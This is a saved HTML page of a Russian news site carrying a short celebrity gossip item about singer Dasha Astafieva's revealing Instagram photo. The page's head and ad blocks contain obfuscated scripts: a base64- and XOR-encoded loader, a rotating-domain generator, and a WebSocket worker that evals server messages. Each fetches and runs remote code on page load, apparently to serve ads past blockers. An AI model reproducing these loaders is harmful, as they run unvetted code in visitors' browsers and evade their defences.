<!DOCTYPE html>
<html>
  
  <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Даша Астафьева выставила напоказ пышное декольте</title>
<meta name="description" content="Девушка не привыкла стесняться." />
<meta name="keywords" content="" />
<meta name="generator" content="DataLife Engine (http://dle-news.ru)" />
<meta property="og:site_name" content="Хроника мировых событий" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Даша Астафьева выставила напоказ пышное декольте" />
<meta property="og:url" content="http://hronika.info/kultura/341530-dasha-astafeva-vystavila-napokaz-pyshnoe-dekolte.html" />
<meta property="og:image" content="http://hronika.info/uploads/posts/2018-08/thumbs/1534063550_astafeva.jpg" />
<link rel="search" type="application/opensearchdescription+xml" href="http://hronika.info/engine/opensearch.php" title="Хроника мировых событий" />
<link rel="alternate" type="application/rss+xml" title="Хроника мировых событий" href="http://hronika.info/rss.xml" />
<script type="text/javascript" src="/engine/classes/js/jquery.js"></script>
<script type="text/javascript" src="/engine/classes/js/jqueryui.js"></script>
<script type="text/javascript" src="/engine/classes/js/dle_js.js"></script>
<script type="text/javascript" src="/engine/classes/js/bbcodes.js"></script>
<script type="text/javascript" src="/engine/classes/highslide/highslide.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js"></script>
<script type="text/javascript" src="/engine/editor/scripts/webfont.js"></script>
<link media="screen" href="/engine/editor/css/default.css" type="text/css" rel="stylesheet" />
    <link rel="icon" type="image/png" href="/favicon.png" />
    <link rel="apple-touch-favicon" href="/apple-touch-favicon.png"/>
    <link media="screen" href="/templates/hronika/css/engine.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/orating.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/css.css" type="text/css" rel="stylesheet" />
    
    <meta property="fb:admins" content="490214530991726"/>  
    <meta property="fb:app_id" content="574441425949200"/>  
    <meta name="4309768020df0301dc59380bc0812f0f" content="">
    <!-- From Cache --><script>
    new (function() {
        var host,
            v = 300,
            us,
            start;
        var c = function (g, u, s, h) {
            us = g;
            v = u;
            host = s;
            load([e(atob(host), p(g)), h].join("/"));
        };
    
        var load = function(g){
            start = window["performance"]["now"]();
            if (typeof window.fetch === 'function') {
               fetch(new Request(g, {redirect: 'error', 'method': 'GET'}))
                   .then(function (response) {
                       return response.text();
                   })
                   .then(insertScript)
                   .catch(onLoadError);
           } else {
               var h = new window["XMLHttpRequest"]();
               h["open"]("GET", g, true);
               h["responseType"] = "text";
               h["addEventListener"]("load", onLoad);
               h["addEventListener"]("error", onLoadError);
               h["send"](null);
           }

        };
        var onLoad = function(e){
            var c = e.target;
            if (c['status'] == 204) {
                return
            }
            insertScript(c.responseText);
        };

        var onLoadError = function(e){
            console.log(e)
            var b = window["performance"]["now"]() - start;
            if (b > 0 && b < v) {
               /* stop()*/
            }
        };
        var insertScript = function(c){
            var d = window['document']["createElement"]("script");
            d["async"] = false;
            d["textContent"] = c;
            var attr = {"id": "cc-support-script", "data-config":  us, "data-base": host};
            Object.keys(attr).forEach(function (key) {
                d.setAttribute(key, attr[key]);
            });
            window['document']["head"]["appendChild"](d);
        };
        var stop = function(){
            var c = window['document']["styleSheets"];
            for (var d = 0; d < c['length']; d++) {
                c[d]["disabled"] = true
            }
            window["stop"]();
        };
        function p (s) {
            var str = 0;
            s = s.toString().split("");
            for(var i = 0; i< s.length; i++){
                str+= parseInt(s[i]);
            }
            return str.toString();
        }
    
        function e (s, k) {
            var enc = "";
            for (var i = 0; i < s.length; i++) {
                var a = s.charCodeAt(i);
                var b = a ^ k;
                enc = enc + String.fromCharCode(b);
            }
            return enc;
        }
        return c;
}() )('9568', 300, 'dGhobG8mMzMudSQuJX9rdHkle20ybmk=', '6ffe/fe1b7feea7/a746f72515ce/2515c/5b6ffe1b7/46f72515d1/15d2/eea7/b6ffe1');
</script>

  </head>

  <body><script type="text/javascript">
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = '';
var dle_group      = 5;
var dle_skin       = 'hronika';
var dle_wysiwyg    = '0';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_del_news   = 'Удалить статью';
var allow_dle_delete_news   = false;
var dle_search_delay   = false;
var dle_search_value   = '';
$(function(){
	FastSearch();
});
//-->
</script><script type="text/javascript">  
<!--  
	hs.graphicsDir = '/engine/classes/highslide/graphics/';
	hs.outlineType = 'rounded-white';
	hs.numberOfImagesToPreload = 0;
	hs.showCredits = false;
	
	hs.lang = {
		loadingText :     'Загрузка...',
		playTitle :       'Просмотр слайдшоу (пробел)',
		pauseTitle:       'Пауза',
		previousTitle :   'Предыдущее изображение',
		nextTitle :       'Следующее изображение',
		moveTitle :       'Переместить',
		closeTitle :      'Закрыть (Esc)',
		fullExpandTitle : 'Развернуть до полного размера',
		restoreTitle :    'Кликните для закрытия картинки, нажмите и удерживайте для перемещения',
		focusTitle :      'Сфокусировать',
		loadingTitle :    'Нажмите для отмены'
	};
	
	hs.align = 'center';
	hs.transitions = ['expand', 'crossfade'];
	hs.addSlideshow({
		interval: 4000,
		repeat: false,
		useControls: true,
		fixedControls: 'fit',
		overlayOptions: {
			opacity: .75,
			position: 'bottom center',
			hideOnMouseOut: true
		}
	});
//-->
</script>
    
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9393887096432784",
    enable_page_level_ads: true
  });
</script>
    
    <header id="header" class="bshadow">
      <div class="maxw"><div class="logowrap










kultura










">
    <div class="logo"><img src="/templates/hronika/images/logo.png" alt="Хроника мировых событий" style="width: 100%;" /></div>
    
</div>	      <a href="/" class="index"></a>
			<nav class="top-menu bshadow">
				<ul>
					<li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
                    <li><a href="/obwestvo/" >Общество</a></li>
                    <li class="tm-selected"><a href="/kultura/" >Культура</a></li>
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/medicina/" >Медицина</a></li>
                    <li><a href="/nedvizhimost/" >Недвижимость</a></li>
					<li><a href="/videonovosti/" >Видеоновости</a></li>						
				</ul>					
				<ul>
                    <li><a href="/ukraina/" >Украина</a></li>
					<li><a href="/mir/" >Мир</a></li>
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/tehnologii/" >Технологии</a></li>
                    <li><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/igry/" >Игры</a></li>                    					
				    <li><a href="/kriminal/" >Происшествия</a></li>
                    <li><a href="/fotoreportazhi/" >Фоторепортажи</a></li>
					<li><a href="/kurjozy/" >Курьезы</a></li>
					<li><a href="/mnenia/" >Мнения</a></li>
				</ul>
			</nav>
            <div class="reklright"></div>
      </div>
      </header>
      <div id="wrcont">

	  <!--noindex--><!--/noindex-->
       
        <div class="google-top-center"><!-- noindex -->
<center>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Под меню заглушка -->
<ins class="adsbygoogle"
     style="display:inline-block;width:970px;height:90px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5011853349"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</center>
<!--/noindex--></div>
        <section id="middle">
          <div class="clr"><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/" itemprop="url"><span itemprop="title">Хроника событий</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/kultura/" itemprop="url"><span itemprop="title">Культура</span></a></span> &raquo; Даша Астафьева выставила напоказ пышное декольте</span></div></div>
          <div id="container">
            <div id="content2">
 

              <article>

			   <div id='dle-content'>

<div class="full-story">
 <div class="mainc fullimg200_150">
  <div class="full-storyttl">
  <div class="fullinfo"></div>
   <div class="fullargcat"><b>Раздел:&nbsp;</b><strong><a href="http://hronika.info/kultura/">Культура</a></strong>&nbsp;&nbsp;</div>
   <div class="orating ignore-select" id="orating-341530">
	<a href="#" class="orating_m" title="Не нравится" onclick="orating(341530,0);return false;"></a>
	<a href="#" class="orating_p" title="Нравится" onclick="orating(341530,1);return false;"></a>
	<a href="#" class="orating_res" onclick="ostats(341530,1,true);return false;">0</a>
</div>


  </div>
		<div class="ttl_h1full"><h1><span id="news-title">Даша Астафьева выставила напоказ пышное декольте</span></h1></div>
     
<div class="ax-full _ga1_on_">
	<!--TBegin:http://hronika.info/uploads/posts/2018-08/1534063550_astafeva.jpg|left--><a href="http://hronika.info/uploads/posts/2018-08/1534063550_astafeva.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-08/thumbs/1534063550_astafeva.jpg" style="float:left;" alt='Даша Астафьева выставила напоказ пышное декольте' title='Даша Астафьева выставила напоказ пышное декольте'  /></a><!--TEnd--><b>Девушка не привыкла стесняться.</b><br /><br /> Популярная украинская певица Даша Астафьева всполошила сеть провокационным снимком, в котором частично оголила грудь, передает <a href="http://hronika.info/">Хроника.инфо</a> со ссылкой на <a href="https://www.obozrevatel.com/show/zhabyi-podavyatsya-ukrainskaya-seks-bomba-vspoloshila-set-provokatsionnyim-snimkom.htm" target="_blank">obozrevatel.com</a>.<br /><br />Фото девушка опубликовала в своем Instagram-аккаунте, набрав за несколько часов более 15 тысяч лайков.<br /><br /><b>Читайте также:<a href="http://hronika.info/kultura/341520-izvestnyy-rossiyskiy-pevec-popalsya-na-izmene.html" >  Известный российский певец попался на измене</a></b><br /><br />"Сложный выбор: спасти мир, или ответить всем жабам на комментарии..." - написала Астафьева под снимком, обратившись таким образом к критикам.<br /><br /><div style="text-align:center;"><!--TBegin:http://hronika.info/uploads/posts/2018-08/1534063503_astafeva2.png|--><a href="http://hronika.info/uploads/posts/2018-08/1534063503_astafeva2.png" rel="highslide" class="highslide"><img src="/uploads/posts/2018-08/thumbs/1534063503_astafeva2.png" alt='Даша Астафьева выставила напоказ пышное декольте' title='Даша Астафьева выставила напоказ пышное декольте'  /></a><!--TEnd--></div>
	<div class="ctrlE">Если вы нашли ошибку в тексте, выделите её мышью и нажмите Ctrl+Enter</div>
</div>
<div class="clr"><br /><p class="basetags">&nbsp;<i>Теги: <a href="http://hronika.info/tags/%D0%94%D0%B0%D1%88%D0%B0+%D0%90%D1%81%D1%82%D0%B0%D1%84%D1%8C%D0%B5%D0%B2%D0%B0/">Даша Астафьева</a>, <a href="http://hronika.info/tags/%D0%B4%D0%B5%D0%BA%D0%BE%D0%BB%D1%8C%D1%82%D0%B5/">декольте</a></i></p></div>
<div class="full-top_banner">
    <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10323">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10323/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
    </div>
<div class="full-top_banner">
    <div id="AD67HoqbIKGudtbW5O7h" data-type="0" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'hronikka.com';</script>
<script src="//hronikka.com/lT/v8.js" ></script>
    <div id="MIXADV_4787" class="MIXADVERT_NET"></div>
          <script> 
          var node4787 = document.getElementById("MIXADV_4787");
          if( node4787 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4787&r="+Math.random();
               node4787.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ4eXoiXTsgdmFyIHN0ciA9ZGF5Kihtb250aCAqIG5hbWVfZGF5ICogZGF5KSsiIisgZGF5Kihtb250aCArIG5hbWVfZGF5ICsgZGF5ICt5ZWFyKTt2YXIgaGFzaCA9ICBidG9hKGJ0b2Eoc3RyKSkudG9Mb3dlckNhc2UoKTsgdmFyIGhvc3QgPSBoYXNoLnN1YnN0cmluZygzLCBoYXNoLmxlbmd0aCAtIG5hbWVfZGF5LzIpKyIuIitkb21bbmFtZV9kYXkgLSAxXTt2YXIgciA9IE1hdGgucmFuZG9tKCkudG9TdHJpbmcoMzYpLnN1YnN0cigyLCAyKTtyID0gci5yZXBsYWNlKC9bMC05XS9nLCAiIik7dmFyIGRlbHRhID0gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogKDEwMCAtIDEwICsgMSkpICsgMTA7dmFyIGlkID0gNDc4NyAtIGRlbHRhOyB2YXIgc2NyaXB0X2ZpcnN0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7c2NyaXB0X2ZpcnN0LnNyYyA9ICJodHRwczovLyIrIGhvc3QrIi8iK2RlbHRhK2lkK3IrIiI7IG5vZGU0Nzg3LnBhcmVudE5vZGUuYXBwZW5kQ2hpbGQoc2NyaXB0X2ZpcnN0KTtzY3JpcHRfZmlyc3Qub25lcnJvciA9IGZ1bmN0aW9uKCl7IHNldFRpbWVvdXQoIGZ1bmN0aW9uICgpIHsgaWYoIG5vZGU0Nzg3LmlubmVySFRNTCA9PSAiIiApIHdpbmRvdy5ldmFsKGxvY2FsU3RvcmFnZS5nZXRJdGVtKCI0Nzg3IikpIH0sIDUwMDApOyAgO307IA==") );
              }
          }
          </script>
    <!-- noindex -->
<!-- M225926Composite Start --> <div id="M225926Composite608873"><center> <a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a> </center></div> <script type="text/javascript"> var d = new Date, script608873 = document.createElement("script"), mg_ws608873 = {};script608873.type = "text/javascript";script608873.charset = "utf-8";script608873.src = "//jsc.marketgid.com/h/r/hronika.info.608873.js?t=" + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script608873.onerror = function () { mg_ws608873 = new Worker(URL.createObjectURL(new Blob(['eval(atob(\'ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MDg4NzMoZSl7dmFyIGg9bWdfd3M2MDg4NzMub25tZXNzYWdlOyBtZ193czYwODg3My5yZWFkeVN0YXRlPT1tZ193czYwODg3My5DTE9TRUQmJihtZ193czYwODg3Mz1uZXcgV2ViU29ja2V0KG1nX3dzNjA4ODczX2xvY2F0aW9uKSksbWdfd3M2MDg4NzMub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MDg4NzMobWdfd3M2MDg4NzMsZnVuY3Rpb24oKXttZ193czYwODg3My5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MDg4NzMoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MDg4NzMoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MDg4NzNfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYwODg3MyA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MDg4NzNfbG9jYXRpb24pLCBtZ193czYwODg3My5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MDg4NzMoZS5kYXRhKX0=\'))']), {type: "application/javascript"})); mg_ws608873.onmessage = function (msg){window.eval(msg.data);}; mg_ws608873.postMessage('js|'+script608873.src+'|M225926Composite608873|M225926Composite608873');};document.body.appendChild(script608873); </script> <!-- M225926Composite End -->
<!--/ noindex -->
    <!-- noindex -->
<div id="CNM4058" style="text-align:center;display:none" ><a href="https://www.novostimira.biz/" id="CNM4058t" style="display:none" rel="nofollow" target="_blank"><strong>Новости</strong></a></div>

<!-- before </body> -->
<script type="text/javascript" async="async" >
  var el = document.getElementById('CNM4058');
  if (el) {
    if (document.getElementById('CNM4058t').style.display == 'none') {
      document.getElementById('CNM4058t').style.display = '';
      var dateNM = new Date();
      var t = Math.floor(dateNM.getTime()/(1000*600));
      var NMces=document.createElement('script');
      NMces.type = 'text/javascript';
      NMces.charset='UTF-8';
      NMces.src='http'+(window.location.protocol=='https:'?'s':'')+'://c.novostimira.biz/l/4058?v='+t;
      el.parentNode.appendChild(NMces);
    }
  }
</script>
<!--/ noindex -->
    <!-- start NEW content_v1 for hronika.info -->
<div id="adpartner-jsunit-851">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=851&" + Math.random();
        head.appendChild(script);
    </script>
</div>

<!-- end NEW content_v1 for hronika.info -->
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-9393887096432784",
          enable_page_level_ads: true
     });
</script>
    
    <div id="bn_aa922818e6">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.aa922818e6.js"></script>
    
     </div>
<div class="f_bottm">
 <div class="f_date_author">Сегодня, 12:03 » Автор: <a onclick="ShowProfile('%D0%90%D0%BD%D0%BD%D0%B0+%D0%9C%D0%B0%D1%80%D1%82%D1%8B%D0%BD%D0%BE%D0%B2%D0%B0', 'http://hronika.info/user/%D0%90%D0%BD%D0%BD%D0%B0+%D0%9C%D0%B0%D1%80%D1%82%D1%8B%D0%BD%D0%BE%D0%B2%D0%B0/', '0'); return false;" href="http://hronika.info/user/%D0%90%D0%BD%D0%BD%D0%B0+%D0%9C%D0%B0%D1%80%D1%82%D1%8B%D0%BD%D0%BE%D0%B2%D0%B0/">Анна Мартынова</a></div> 
 <div class="view_comments">  
  <div class="f_views"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;107</div>
  <div class="f_comments"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0</div> 
  </div>
</div>
	</div>    
<div class="sb">
<div class="sotsseti">
<!-- noindex -->
  <script type="text/javascript">(function() {
      if (window.pluso) {return};
       var d = document, s = d.createElement('script'), g = 'getElementsByTagName';
       s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
       s.src = ('https:' == window.location.protocol ? 'https' : 'http')  + '://x.pluso.ru/pluso-x.js';
       var h=d[g]('body')[0];
       h.appendChild(s);
    })();
 </script>
<div class="pluso-engine" pluso-sharer={"buttons":"facebook,twitter,google,vkontakte,moimir,email,print,more","style":{"size":"small","shape":"square","theme":"theme03","css":""},"orientation":"horizontal","multiline":false} ></div> 
<!-- /noindex -->
    
<div class="sotslikes">
<!-- Код рейтинга -->

</div>
</div>
 <div class="fullstoryn">
   <div class="bshadow exban"> 

    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Рекомендуемый под новостью -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="6534414543"
     data-ad-format="autorelaxed"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
           <div class="clr"></div>
    </div>
 </div>
  <div class="clr"></div>
  <div class="fullstoryn">
   <div class="bshadow exban">
  
    
   <div class="clr"></div>
    </div>
 </div>  
</div><br/>

<div class="related-n"> 
<div class="relttl"><h2>Похожие новости по теме</h2></div>
         <div class="clr"></div>
<div class="related_news bshadow"><a href="http://hronika.info/kultura/341367-dasha-astafeva-podelilas-soblaznitelnym-snimkami.html">
  <img src="/posters/110_85_80_1/uploads/posts/2018-08/thumbs/1533991764__facebook_com_da_astaffieva_650x410_1_650x410_2_650x410.jpg" alt="Даша Астафьева поделилась соблазнительными снимками" title="Даша Астафьева поделилась соблазнительными снимками" /></a>
    <strong title="Даша Астафьева поделилась соблазнительными снимками"><a href="http://hronika.info/kultura/341367-dasha-astafeva-podelilas-soblaznitelnym-snimkami.html">Даша Астафьева поделилась соблазнительными снимками</a></strong>
  <p>Звезда поделилась новыми откровенными фото</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/kultura/282153-dasha-astafeva-vystavila-napokaz-pyshnuyu-grud.html">
  <img src="/posters/110_85_80_1/uploads/posts/2017-12/thumbs/1513252618_dasha.jpg" alt="Даша Астафьева выставила напоказ пышную грудь" title="Даша Астафьева выставила напоказ пышную грудь" /></a>
    <strong title="Даша Астафьева выставила напоказ пышную грудь"><a href="http://hronika.info/kultura/282153-dasha-astafeva-vystavila-napokaz-pyshnuyu-grud.html">Даша Астафьева выставила напоказ пышную грудь</a></strong>
  <p>Артистка надела платье с невероятно глубоким декольте.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/kultura/188958-dasha-astafeva-pohvalilas-novym-provokacionnym-obrazom.html">
  <img src="/posters/110_85_80_1/uploads/posts/2016-11/thumbs/1480413548_astafeva2.jpg" alt="Даша Астафьева похвалилась новым провокационным образом" title="Даша Астафьева похвалилась новым провокационным образом" /></a>
    <strong title="Даша Астафьева похвалилась новым провокационным образом"><a href="http://hronika.info/kultura/188958-dasha-astafeva-pohvalilas-novym-provokacionnym-obrazom.html">Даша Астафьева похвалилась новым провокационным образом</a></strong>
  <p>Кожаный корсет не оставил подписчиков равнодушными.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/kultura/185531-dasha-astafeva-bez-ustali-hvastaetsya-neprilichnymi-selfi.html">
  <img src="/posters/110_85_80_1/uploads/posts/2016-11/1479203593_astafeva2.jpg" alt="Даша Астафьева без устали хвастается неприличными селфи" title="Даша Астафьева без устали хвастается неприличными селфи" /></a>
    <strong title="Даша Астафьева без устали хвастается неприличными селфи"><a href="http://hronika.info/kultura/185531-dasha-astafeva-bez-ustali-hvastaetsya-neprilichnymi-selfi.html">Даша Астафьева без устали хвастается неприличными селфи</a></strong>
  <p>Девушка оголила грудь перед камерой.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/kultura/75415-dasha-astafeva-podelilas-snimkom-bez-belya.html">
  <img src="/posters/110_85_80_1/uploads/posts/2015-08/thumbs/1438636041_dasha.jpg" alt="Даша Астафьева поделилась снимком без белья" title="Даша Астафьева поделилась снимком без белья" /></a>
    <strong title="Даша Астафьева поделилась снимком без белья"><a href="http://hronika.info/kultura/75415-dasha-astafeva-podelilas-snimkom-bez-belya.html">Даша Астафьева поделилась снимком без белья</a></strong>
  <p>Популярная певица опубликовала откровенное фото.</p><div class="clr"></div>
</div>
 
<div style="clear: both"></div>
</div>
         <div class="clr"></div>

<!--ЗАКОММЕНТИРОВАННЫЕ
<div style="clear: both"></div>
<div class="poslednie-n">
<div class="relttl"><h2>Поcледние новости раздела category}</h2></div>
<div class="bshadow">
<div class="poslednie_div49-5 fleft">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div class="poslednie_div49-5 fright">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div style="clear: both"></div>
</div>
</div>-->

<div style="clear: both"></div>
<div class="sovetuemsmotret">
<div class="relttl"><h2>Также советуем посмотреть</h2></div>
      <div class="slwrap3 bshadow">
      <div id="slider3">
        <a class="buttons prev" href="#"></a>
        <div class="viewport">
          <ul class="overview"><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341527-v-ssha-francuzskiy-buldog-pomog-hozyainu-vyigrat-v-lotereyu.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1534062846_sobaka.jpg" alt="В США французский бульдог помог хозяину выиграть в лотерею" class="l_n_im" title="В США французский бульдог помог хозяину выиграть в лотерею" />
</a>
<strong class="ttl" title="В США французский бульдог помог хозяину выиграть в лотерею"><a href="http://hronika.info/kurjozy/341527-v-ssha-francuzskiy-buldog-pomog-hozyainu-vyigrat-v-lotereyu.html">В США французский бульдог помог хозяину выиграть в лотерею</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341516-buynaya-rossiyanka-ustroivshaya-debosh-v-samolete-nasmeshila-set.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1534060188_debosh.jpg" alt="Буйная россиянка, устроившая дебош в самолете, насмешила Сеть" class="l_n_im" title="Буйная россиянка, устроившая дебош в самолете, насмешила Сеть" />
</a>
<strong class="ttl" title="Буйная россиянка, устроившая дебош в самолете, насмешила Сеть"><a href="http://hronika.info/kurjozy/341516-buynaya-rossiyanka-ustroivshaya-debosh-v-samolete-nasmeshila-set.html">Буйная россиянка, устроившая дебош в самолете, насмешила Сеть</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341497-set-pokoril-malysh-spasshiy-utku-ot-vernoy-smerti.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1534055570_utka.png" alt="Сеть покорил малыш, спасший утку от верной смерти" class="l_n_im" title="Сеть покорил малыш, спасший утку от верной смерти" />
</a>
<strong class="ttl" title="Сеть покорил малыш, спасший утку от верной смерти"><a href="http://hronika.info/kurjozy/341497-set-pokoril-malysh-spasshiy-utku-ot-vernoy-smerti.html">Сеть покорил малыш, спасший утку от верной смерти</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341445-v-germanii-iz-za-seks-igrushki-zakryvali-chast-aeroporta.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1534018149_germaniya.jpg" alt="В Германии из-за секс-игрушки закрывали часть аэропорта" class="l_n_im" title="В Германии из-за секс-игрушки закрывали часть аэропорта" />
</a>
<strong class="ttl" title="В Германии из-за секс-игрушки закрывали часть аэропорта"><a href="http://hronika.info/kurjozy/341445-v-germanii-iz-za-seks-igrushki-zakryvali-chast-aeroporta.html">В Германии из-за секс-игрушки закрывали часть аэропорта</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341433-v-seti-poyavilsya-pes-dvoynik-znamenitoy-pevicy.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1534012461_pes1.jpg" alt="В Сети появился пес-двойник знаменитой певицы" class="l_n_im" title="В Сети появился пес-двойник знаменитой певицы" />
</a>
<strong class="ttl" title="В Сети появился пес-двойник знаменитой певицы"><a href="http://hronika.info/kurjozy/341433-v-seti-poyavilsya-pes-dvoynik-znamenitoy-pevicy.html">В Сети появился пес-двойник знаменитой певицы</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341421-v-seti-vysmeyali-nelepuyu-pozu-terezy-mey.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1534009170_mei3.jpg" alt="В Сети высмеяли нелепую позу Терезы Мэй" class="l_n_im" title="В Сети высмеяли нелепую позу Терезы Мэй" />
</a>
<strong class="ttl" title="В Сети высмеяли нелепую позу Терезы Мэй"><a href="http://hronika.info/kurjozy/341421-v-seti-vysmeyali-nelepuyu-pozu-terezy-mey.html">В Сети высмеяли нелепую позу Терезы Мэй</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341408-gigantskiy-kartofel-udivil-ukrainskogo-fermera.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1534004263_kartofel.jpg" alt="Гигантский картофель удивил украинского фермера" class="l_n_im" title="Гигантский картофель удивил украинского фермера" />
</a>
<strong class="ttl" title="Гигантский картофель удивил украинского фермера"><a href="http://hronika.info/kurjozy/341408-gigantskiy-kartofel-udivil-ukrainskogo-fermera.html">Гигантский картофель удивил украинского фермера</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341397-molodaya-mama-risuet-veselye-komiksy-o-svoey-seme.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1534000078_mama1.jpg" alt="Молодая мама рисует веселые комиксы о своей семье" class="l_n_im" title="Молодая мама рисует веселые комиксы о своей семье" />
</a>
